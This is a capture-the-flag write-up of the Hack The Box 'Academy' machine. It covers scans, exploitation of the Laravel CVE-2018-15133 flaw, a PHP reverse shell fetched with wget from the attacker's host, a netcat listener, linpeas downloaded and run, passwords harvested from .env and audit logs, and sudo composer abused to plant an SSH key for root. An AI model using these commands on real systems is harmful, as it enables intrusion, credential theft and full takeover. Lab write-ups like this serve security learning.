Academy
Introduction:
Academy is a great machine with lots of rabbit holes and opportunities to learn. I spent a lot of time tinkering this one and looked for lot of hints for the priv-escalation.
Recon
NMAP scan
1# Nmap 7.91 scan initiated Sun Jan 3 09:00:32 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /oscp/tools/AutoRecon/src/autorecon/results/academy.htb/scans/_full_tcp_nmap.txt -oX /oscp/tools/AutoRecon/src/autorecon/results/academy.htb/scans/xml/_full_tcp_nmap.xml academy.htb
2Nmap scan report for academy.htb (10.10.10.215)
3Host is up, received user-set (0.015s latency).
4Scanned at 2021-01-03 09:00:32 EST for 90s
5Not shown: 65532 closed ports
6Reason: 65532 conn-refused
7PORT STATE SERVICE REASON VERSION
822/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
9| ssh-hostkey:
10| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
11| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/0BA3dU0ygKCvP7G3GklCeOqxb17vxMCsugN05RA9Fhj7AzkPiMLrrKRY656gBuscH23utAWAhRXzV1SyU37bbFzEbfaqYAlh1ggHEuluLgbf9QsYZe76zCx2SRPOzoI9Q40klVvuu9E92pNLe80dvUZj644EwhJTGw4KGxeOqeuo/nXnYfiNAbWvOe9Qp+djDbEvP5lHwIDMTAtgggoSC1chubC3jFC4hihuYjtitjUr4+5fROomhJAo/GEvdBj2CYNHIFEvmuvb32cgul5ENQS4fJXpcI7fbP9/+b/cfA9oRxG2k+k1M8mUld2h5mHEVBE5Z9WKS3cRYu97oVKnRRCoDY/55mZw6lngIdH4drpYwzCrZcCWgviXRfCeOwmZ8sucap6qN/nFYnPoF7fd+LGaQOhz9MkAZCTMmLqSiZGSistAIPzHtABH0VQDbo2TqJ+kGWr9/EamCcYBbVVPaFj/XQqujoEjLYW+igihwrPEQ7zxlleQHwg91oSVy38=
12| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
13| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAIMsz8qKL1UCyrPmpM5iTmoy3cOsk+4L7oFdcPjBXwAcUVvnti7nXHlNqMfgsapbGSIl7AWTOeXLZmw2J6JWvE=
14| 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
15|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBP1E2rWeTShvyJKxC5Brv1Do3OwvWIzlZHWVw/bD0R
1680/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
17| http-methods:
18|_ Supported Methods: GET HEAD POST OPTIONS
19|_http-server-header: Apache/2.4.41 (Ubuntu)
20|_http-title: Hack The Box Academy
2133060/tcp open socks5 syn-ack
22| fingerprint-strings:
23| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe:
24| Invalid message"
25| HY000
26| Radmin:
27| authentication.mechanisms
28| MYSQL41
29| SHA256_MEMORY
30| doc.formats
31| text
32| client.interactive
33| compression
34| algorithm
35| deflate_stream
36| lz4_message
37| zstd_stream
38| node_type
39| mysql
40|_ client.pwd_expire_ok
41| socks-auth-info:
42| No authentication
43| No authentication
44|_ No authentication
451 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
46SF-Port33060-TCP:V=7.91%I=9%D=1/3%Time=5FF1CE15%P=x86_64-pc-linux-gnu%r(NU
47SF:LL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\x
48SF:08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOpt
49SF:ions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b\
50SF:x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersi
51SF:onBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B
52SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fIn
53SF:valid\x20message\"\x05HY000")%r(Hello,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
54SF:%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SSLSessionReq,2B,"\x05\0\0\
55SF:0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20me
56SF:ssage\"\x05HY000")%r(TerminalServerCookie,9,"\x05\0\0\0\x0b\x08\x05\x1a
57SF:\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08
58SF:\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(SSLv23SessionReq
59SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05
60SF:\x1a\0")%r(SMBProgNeg,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"
61SF:\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInva
62SF:lid\x20message\"\x05HY000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x
63SF:05\x1a\0")%r(LPDString,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchRe
64SF:q,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x
65SF:0fInvalid\x20message\"\x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x
66SF:05\x1a\0")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,
67SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x0
68SF:8\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x
69SF:05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvali
70SF:d\x20message\"\x05HY000")%r(DistCCD,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
71SF:(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(Radmin,15D,"\x05\0\0\0\x0b
72SF:\x08\x05\x1a\0P\x01\0\0\x02\n\x0f\n\x03tls\x12\x08\x08\x01\x12\x04\x08\
73SF:x07@\0\nM\n\x19authentication\.mechanisms\x120\x08\x03\",\n\x11\x08\x01
74SF:\x12\r\x08\x08J\t\n\x07MYSQL41\n\x17\x08\x01\x12\x13\x08\x08J\x0f\n\rSH
75SF:A256_MEMORY\n\x1d\n\x0bdoc\.formats\x12\x0e\x08\x01\x12\n\x08\x08J\x06\
76SF:n\x04text\n\x1e\n\x12client\.interactive\x12\x08\x08\x01\x12\x04\x08\x0
77SF:7@\0\nn\n\x0bcompression\x12_\x08\x02\x1a\[\nY\n\talgorithm\x12L\x08\x0
78SF:3\"H\n\x18\x08\x01\x12\x14\x08\x08J\x10\n\x0edeflate_stream\n\x15\x08\x
79SF:01\x12\x11\x08\x08J\r\n\x0blz4_message\n\x15\x08\x01\x12\x11\x08\x08J\r
80SF:\n\x0bzstd_stream\n\x1c\n\tnode_type\x12\x0f\x08\x01\x12\x0b\x08\x08J\x
81SF:07\n\x05mysql\n\x20\n\x14client\.pwd_expire_ok\x12\x08\x08\x01\x12\x04\
82SF:x08\x07@\0");
83Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
84
85Read data files from: /usr/bin/../share/nmap
86Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
87# Nmap done at Sun Jan 3 09:02:02 2021 -- 1 IP address (1 host up) scanned in 90.90 seconds
88
Enumeration
Nikto Scan
1- Nikto v2.1.6
2---------------------------------------------------------------------------
3+ Target IP: 10.10.10.215
4+ Target Hostname: academy.htb
5+ Target Port: 80
6+ Start Time: 2021-01-03 09:00:41 (GMT-5)
7---------------------------------------------------------------------------
8+ Server: Apache/2.4.41 (Ubuntu)
9+ The anti-clickjacking X-Frame-Options header is not present.
10+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
11+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
12+ No CGI Directories found (use '-C all' to force check all possible dirs)
13+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
14+ Cookie PHPSESSID created without the httponly flag
15+ /config.php: PHP Config file may contain database IDs and passwords.
16+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
17+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
18+ OSVDB-3092: /admin.php: This might be interesting...
19+ /login.php: Admin login page/section found.
20+ 7785 requests: 0 error(s) and 10 item(s) reported on remote host
21+ End Time: 2021-01-03 09:05:08 (GMT-5) (267 seconds)
22---------------------------------------------------------------------------
23+ 1 host(s) tested
24
whatweb
1WhatWeb report for http://academy.htb:80
2Status : 200 OK
3Title : Hack The Box Academy
4IP : 10.10.10.215
5Country : RESERVED, ZZ
6
7Summary : HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], Apache[2.4.41]
8
9Detected Plugins:
10[ Apache ]
11 The Apache HTTP Server Project is an effort to develop and
12 maintain an open-source HTTP server for modern operating
13 systems including UNIX and Windows NT. The goal of this
14 project is to provide a secure, efficient and extensible
15 server that provides HTTP services in sync with the current
16 HTTP standards.
17
18 Version : 2.4.41 (from HTTP Server Header)
19 Google Dorks: (3)
20 Website : http://httpd.apache.org/
21
22[ HTTPServer ]
23 HTTP server header string. This plugin also attempts to
24 identify the operating system from the server header.
25
26 OS : Ubuntu Linux
27 String : Apache/2.4.41 (Ubuntu) (from server string)
28
29HTTP Headers:
30 HTTP/1.1 200 OK
31 Date: Sun, 03 Jan 2021 14:08:55 GMT
32 Server: Apache/2.4.41 (Ubuntu)
33 Vary: Accept-Encoding
34 Content-Encoding: gzip
35 Content-Length: 716
36 Connection: close
37 Content-Type: text/html; charset=UTF-8
38
39
Exploitation
During web enumeration, you will encounter admin-page.php on the root site that gives away another subdomain - http://dev-staging-01.academy.htb. Add this to the /etc/hosts to create an alias, then visit the domain.
The website seems to be running laravel framework, and a quick search reveals a RCS vulnerability - CVE-2018-15133
I wanted to avoid using metasploit so I explored for alternatives and found a pan-laravel.py script on github.com.
Prepare reverse shell
1eneloop@kinetic:.../hackthebox/academy/data$ cp /usr/share/webshells/php/php-reverse-shell.php .
2eneloop@kinetic:.../hackthebox/academy/data$ echo "enel00p" | base64
3ZW5lbDAwcAo=
4eneloop@kinetic:.../hackthebox/academy/data$ mv php-reverse-shell.php ZW5lbDAwcAo.php
5eneloop@kinetic:.../hackthebox/academy/data$ vi ZW5lbDAwcAo.php
Start webserver
1eneloop@kinetic:.../hackthebox/academy/data$ py3
2
3
4(py3) eneloop@kinetic:.../hackthebox/academy/data$ python -m http.server
5Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
610.10.10.215 - - [03/Jan/2021 11:00:51] "GET /ZW5lbDAwcAo.php HTTP/1.1" 200 -
710.10.10.215 - - [03/Jan/2021 11:01:21] "GET /ZW5lbDAwcAo.php HTTP/1.1" 200 -
810.10.10.215 - - [03/Jan/2021 11:04:15] "GET /ZW5lbDAwcAo.php HTTP/1.1" 200 -
Run the exploit
1(py3) eneloop@kinetic:.../hackthebox/academy/data$ ./pwn-laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c 'ls -l ../../academy/public'
2
3total 96
4drwxr-xr-x 2 root root 4096 Nov 5 12:23 Modules_files
5-rw-r--r-- 1 root root 1600 Aug 11 00:55 admin-page.php
6-rw-r--r-- 1 root root 3247 Aug 12 21:28 admin.php
7-rw-r--r-- 1 root root 174 Aug 9 16:55 config.php
8-rw-r--r-- 1 root root 55036 Nov 9 10:13 home.php
9drwxr-xr-x 2 www-data www-data 4096 Sep 14 22:38 images
10-rw-r--r-- 1 www-data www-data 2117 Sep 14 22:40 index.php
11-rw-r--r-- 1 root root 3185 Aug 12 21:28 login.php
12-rw-r--r-- 1 root root 4304 Nov 5 12:51 register.php
13-rw-r--r-- 1 root root 685 Aug 10 22:49 success-page.php
14
15(py3) eneloop@kinetic:.../hackthebox/academy/data$ ./pwn-laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c 'ls -l ../../academy/public'^C
16(py3) eneloop@kinetic:.../hackthebox/academy/data$ ./pwn-laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c 'cd ../../academy/public && wget http://10.10.14.25:8000/ZW5lbDAwcAo.php'
17
18
19(py3) eneloop@kinetic:.../hackthebox/academy/data$ ./pwn-laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c 'ls -l ../../academy/public'
20
21total 104
22drwxr-xr-x 2 root root 4096 Nov 5 12:23 Modules_files
23-rw-r--r-- 1 www-data www-data 5493 Jan 3 15:59 ZW5lbDAwcAo.php
24-rw-r--r-- 1 root root 1600 Aug 11 00:55 admin-page.php
25-rw-r--r-- 1 root root 3247 Aug 12 21:28 admin.php
26-rw-r--r-- 1 root root 174 Aug 9 16:55 config.php
27-rw-r--r-- 1 root root 55036 Nov 9 10:13 home.php
28drwxr-xr-x 2 www-data www-data 4096 Sep 14 22:38 images
29-rw-r--r-- 1 www-data www-data 2117 Sep 14 22:40 index.php
30-rw-r--r-- 1 root root 3185 Aug 12 21:28 login.php
31-rw-r--r-- 1 root root 4304 Nov 5 12:51 register.php
32-rw-r--r-- 1 root root 685 Aug 10 22:49 success-page.php
33
34(py3) eneloop@kinetic:.../hackthebox/academy/data$
Start a local listener to catch the remote shell
1(py3) eneloop@kinetic:.../tools/reverse-shell/python$ nc -lvnp 4444
2listening on [any] 4444 ...
3connect to [10.10.14.25] from (UNKNOWN) [10.10.10.215] 42648
4Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
5 16:13:01 up 13:01, 0 users, load average: 0.00, 0.00, 0.20
6USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
7uid=33(www-data) gid=33(www-data) groups=33(www-data)
8/bin/sh: 0: can't access tty; job control turned off
9$ python
10
Now, we have shell!
Post-exploit/PrivEsc
Download and run linpeas
1$ wget http://10.10.14.25:8000/linpeas.sh
2--2021-01-03 16:18:03-- http://10.10.14.25:8000/linpeas.sh
3Connecting to 10.10.14.25:8000... connected.
4HTTP request sent, awaiting response... 200 OK
5Length: 300193 (293K) [text/x-sh]
6Saving to: 'linpeas.sh'
7
8 0K .......... .......... .......... .......... .......... 17% 1.68M 0s
9 50K .......... .......... .......... .......... .......... 34% 3.28M 0s
10 100K .......... .......... .......... .......... .......... 51% 5.87M 0s
11 150K .......... .......... .......... .......... .......... 68% 4.69M 0s
12 200K .......... .......... .......... .......... .......... 85% 6.66M 0s
13 250K .......... ...... .......... .......... ... 100% 6.66M=0.08s
14
152021-01-03 16:18:03 (3.75 MB/s) - 'linpeas.sh' saved [300193/300193]
16
17$ ./linpeas.sh
18/bin/sh: 6: ./linpeas.sh: Permission denied
19$ chmod 755 linpeas.sh
20$ ./linpeas.sh
21 Starting linpeas. Caching Writable Folders...
22
23
24
25[+] Files inside others home (limit 20)
26/home/ch4p/.profile
27/home/ch4p/.bashrc
28/home/ch4p/.bash_logout
29/home/egre55/.profile
30/home/egre55/.bashrc
31/home/egre55/.bash_logout
32/home/egre55/.sudo_as_admin_successful
33/home/g0blin/.profile
34/home/g0blin/.bashrc
35/home/g0blin/.bash_logout
36/home/21y4d/.profile
37/home/21y4d/.bashrc
38/home/21y4d/.bash_logout
39/home/cry0l1t3/.profile
40/home/cry0l1t3/user.txt
41/home/cry0l1t3/.bashrc
42/home/cry0l1t3/.bash_logout
43/home/mrb3n/.cache/composer/.htaccess
44/home/mrb3n/.cache/motd.legal-displayed
45/home/mrb3n/.profile
46
47
48
49[+] Searching backup-manager files
50backup-manager file: /var/www/html/academy/config/database.php
51backup-manager file: /var/www/html/htb-academy-dev-01/config/database.php
52
53[+] Searching uncommon passwd files (splunk)
54backup-manager file: /etc/pam.d/passwd
55backup-manager file: /usr/share/bash-completion/completions/passwd
56backup-manager file: /usr/share/lintian/overrides/passwd
57
58[+] All users & groups
59uid=0(root) gid=0(root) groups=0(root)
60uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
61uid=10(uucp) gid=10(uucp) groups=10(uucp)
62uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
63uid=1000(egre55) gid=1000(egre55) groups=1000(egre55),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
64uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
65uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
66uid=1003(21y4d) gid=1003(21y4d) groups=1003(21y4d)
67uid=1004(ch4p) gid=1004(ch4p) groups=1004(ch4p)
68uid=1005(g0blin) gid=1005(g0blin) groups=1005(g0blin)
69
70[+] Searching passwords in config PHP files
71/var/www/html/academy/config/database.php
72/var/www/html/htb-academy-dev-01/config/database.php
73
Grep recursively for passwords
1www-data@academy:grep -ir password /var/www/html | grep -vE '\$password|\$PASSWORD' | awk '{print $1}' | sort | uniq
1www-data@academy:/var/www/html/academy$ cat .env
2mySup3rP4s5w0rd!!
1www-data@academy:/var/www/html/academy$ cat /etc/passwd | grep -vE 'nologin|false'
2<academy$ cat /etc/passwd | grep -vE 'nologin|false'
3root:x:0:0:root:/root:/bin/bash
4sync:x:4:65534:sync:/bin:/bin/sync
5egre55:x:1000:1000:egre55:/home/egre55:/bin/bash
6mrb3n:x:1001:1001::/home/mrb3n:/bin/sh
7cry0l1t3:x:1002:1002::/home/cry0l1t3:/bin/sh
821y4d:x:1003:1003::/home/21y4d:/bin/sh
9ch4p:x:1004:1004::/home/ch4p:/bin/sh
10g0blin:x:1005:1005::/home/g0blin:/bin/sh
11
12
13[+] Checking for TTY (sudo/su) passwords in audit logs
141. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
152. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
16/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
17
1$ cat /tmp/tmp.nydKjmkOf4/composer.json
2cat /tmp/tmp.nydKjmkOf4/composer.json
3{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}
4$ cd /tmp/tmp.nydKjmkOf4/
5cd /tmp/tmp.nydKjmkOf4/
6$ TF=/tmp/tmp.nydKjmkOf4
7TF=/tmp/tmp.nydKjmkOf4
8$ cat composer.json
9cat composer.json
10{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}
11$
12
1 cat composer.json
2cat composer.json
3{"scripts":{"x":"date"}}
4$ sudo composer --working-dir=$TF run-script x
5sudo composer --working-dir=$TF run-script x
6[sudo] password for mrb3n: mrb3n_Ac@d3my!
7
8PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
9PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
10Do not run Composer as root/super user! See https://getcomposer.org/root for details
11> date
12Sun 03 Jan 2021 05:25:23 PM UTC
13
14
15/tmp/tmp.nydKjmkOf4
16$ ls
17ls
18composer.json
19$
20echo '{"scripts":{"x":'\"echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7E27YG63IorxGpi705pC4LC5qBNnLyhbtqc01Lq5R4Lp/DnWFYIFljgrRyZqnXsSG5eXkrfJHl8SvyyatPZTrUxFxXUsFz8TBDg+LTAfUMqbsYR4NBtfR5JjuZB8PvbWbFHRKhkrekLuhavcrhYfCk2ZDliagvBGYy/NSNwnpgzvC362RKP7Af3VpldkzHgg1+wN8vHLmfuGjkNd3Lq6xIV67nU5pWfT7oklNFV1TS9MQuX2YHVh/E6+hQH57v2fMCAbp+IXNEUi2UGEHtUmNiw5wSKY9SQtZ5ek1nx0W1VQp6gex/BpVzBxmQ1TZlM8CIOgaSTr+M+/XVrbmPCtt9CdmLSpA6R2ipVlP6Ou70bec6wj4dWWMW6HpwJjJFd2cnitS5frTMMDYKD+erkRupWPuDBurcO1LM7S67TgPjNpgXxWmaXhMRzllgouednTo+A0+T81J6WyT9USoEz6mmxftGBQLPyw6mXkWApvgHsfuCNLy2ZTPbEQiMHvmjBU= root@kinetic" \>\>/root/.ssh/authorized_keys\"'}}' > composer.json
21
22echo '{"scripts":{"x":"cat /root/.ssh/authorized_keys"}}' > composer.json; sudo composer --working-dir=$TF run-script x;
23
24
25$ cp composer.json composer.json.key
26cp composer.json composer.json.key
27$ ls
28ls
29composer.json composer.json.key
30
1$ echo '{"scripts":{"x":"ls -l /root/.ssh/"}}' > composer.json; sudo composer --working-dir=$TF run-script x;
2echo '{"scripts":{"x":"ls -l /root/.ssh/"}}' > composer.json; sudo composer --working-dir=$TF run-script x;
3[sudo] password for mrb3n: mrb3n_Ac@d3my!
4
5PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
6PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
7Do not run Composer as root/super user! See https://getcomposer.org/root for details
8> ls -l /root/.ssh/
9total 4
10-rw------- 1 root root 1132 Jan 3 17:34 authorized_keys
11$ echo '{"scripts":{"x":"cat /root/.ssh/authorized_keys"}}' > composer.json; sudo composer --working-dir=$TF run-script x;
12echo '{"scripts":{"x":"cat /root/.ssh/authorized_keys"}}' > composer.json; sudo composer --working-dir=$TF run-script x;
13[sudo] password for mrb3n: mrb3n_Ac@d3my!
14
15PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
16PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
17Do not run Composer as root/super user! See https://getcomposer.org/root for details
1> cat /root/.ssh/authorized_keys
2ssh-rsa AAAAB3Nsfdsdfsdfgsdgsdfgsfdghhsfghdfghdfhhthfhfgh01Lq5R4Lp/DnWFYIFljgrRyZqnXsSG5eXkrfJHl8SvyyatPZTrUxFxXUsFz8TBDg+LTAfUMqbsYR4NBtfR5JjuZB8PvbWbFHRKhkrekLuhavcrhhgdfhghgfdhgdfhgfdhfghshshsh9MQuX2YHVh/E6+hQH57v2fMCAbp+IXNEUi2UGEHtUmNiw5wSKY9SQtZ5ek1nx0W1VQp6gex/BpVzBxmQ1TZlM8CIOgaSTr+M+/XVrbmPCtt9CdmLSpA6R2ipVlP6Ou70bec6wj4dWWMW6HpwJjJFd2cnitS5frTMMDYKD+erkRupWPuDBurcO1LMhttrhtfhfhhdhdhduCNLy2ZTPbEQiMHvmjBU= root@kinetic
3ssh-rsa AAAAB3NzaC1ghfghfgdhgfdhgfdhgfhfghfghgfhhshhgshG5eXkrfJHl8SvyyatPZTrUxFxXUsFz8TBDg+LTAfUMqbsYR4NBtfR5JjuZB8PvbWbFHRKhkrekLuhavcrhYfCk2ZDliagvBGYy/NSNwnpgzvC362RKP7Af3VpldkzHgg1+wN8vHLmfuGjkNd3Lq6xIV67nU5pWfT7oklNFV1TS9MQuX2YHVh/E6+hQHfgshfghgfhfgh1VQp6gex/BpVzBxmQ1TZlM8CIOgaSTr+M+/XVrbmPCtt9CdmLSpA6RhghghgfhghgdfhfghgfhsghshfgdWmaXhMRzllgouednTo+A0+T81J6WyT9USoEz6mmxftGBQLPyw6mXkWApvgHsfuCNLy2ZTPbEQiMHvmjBU= root@kinetic
4$
1
2eneloop@kinetic:/oscp/tools$ cd ../keys
3eneloop@kinetic:/oscp/keys$ ls
4kali kali.pub
5eneloop@kinetic:/oscp/keys$ ssh -i kali.pub [email protected]
6Load key "kali.pub": invalid format
7eneloop@kinetic:/oscp/keys$ ssh -i kali [email protected]
8Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
9
10 * Documentation: https://help.ubuntu.com
11 * Management: https://landscape.canonical.com
12 * Support: https://ubuntu.com/advantage
13
14 System information as of Sun 03 Jan 2021 05:38:53 PM UTC
15
16 System load: 0.0
17 Usage of /: 44.8% of 15.68GB
18 Memory usage: 25%
19 Swap usage: 0%
20 Processes: 199
21 Users logged in: 0
22 IPv4 address for ens160: 10.10.10.215
23 IPv6 address for ens160: dead:beef::250:56ff:feb9:b490
24
25
260 updates can be installed immediately.
270 of these updates are security updates.
28
29Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
30
31
32Last login: Mon Nov 9 10:11:49 2020
33root@academy:~# cat root.txt
34